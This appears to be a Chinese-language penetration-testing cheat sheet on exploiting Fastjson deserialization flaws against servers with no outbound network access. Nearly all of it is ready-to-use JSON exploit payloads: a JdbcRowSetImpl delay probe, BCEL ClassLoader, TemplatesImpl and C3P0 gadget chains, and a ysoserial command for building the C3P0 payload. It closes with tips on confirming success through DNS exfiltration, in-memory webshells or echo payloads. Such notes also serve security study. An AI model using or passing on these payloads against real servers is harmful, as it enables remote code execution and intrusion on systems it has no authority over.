//文章:https://xz.aliyun.com/news/11938
//资料:https://github.com/safe6Sec/Fastjson
不出网
限制网络不能访问 jndi 指向的地址
验证是否存在漏洞(不出网)
jndi 指向一个本地不存在的类,看是否有延迟
{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8088/badClassName", "autoCommit":true}}""
}
确定不出网,有漏洞
1.BCEL-Tomcat&Spring
字节码绕过,将恶意类通过 javac 转换成字节码
com.sun.org.apache.bcel.internal.util.ClassLoader,可以加载 BCEL 字节码,实现 RCE
POC:
{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$xxxx"
}
2.TemplatesImpl链
利用条件苛刻,需要:
JSON.parseObject(poc, Feature.SupportNonPublicField);
POC:
{
"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes": ["base64(字节码)"],
'_name': 'a.b',
'_tfactory': {},
"_outputProperties": {},
"_name": "b",
"_version": "1.0",
"allowedProtocols": "all"
}
3.C3P0
利用条件需要以下目标服务器有依赖:
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>POC:hex 通过 java -jar ysoserial-all.jar CommonsCollections2 "open -a Calculator" > calc.ser,再通过程序生成 HEX
{
"@type": "java.lang.Class",
"val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
},
"f": {
"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
"userOverridesAsString": "HexAsciiSerializedMap:;HEX值"
}
闲谈
实验中只用了calc,但是计算器只能在对方服务器弹出,怎么知道是否成功
1.尝试 DNS 外带,如果 dns 没被限制的话
2.尝试构造内存马或者回显payload
3.写一个文件并访问打开,不过需要绝对路径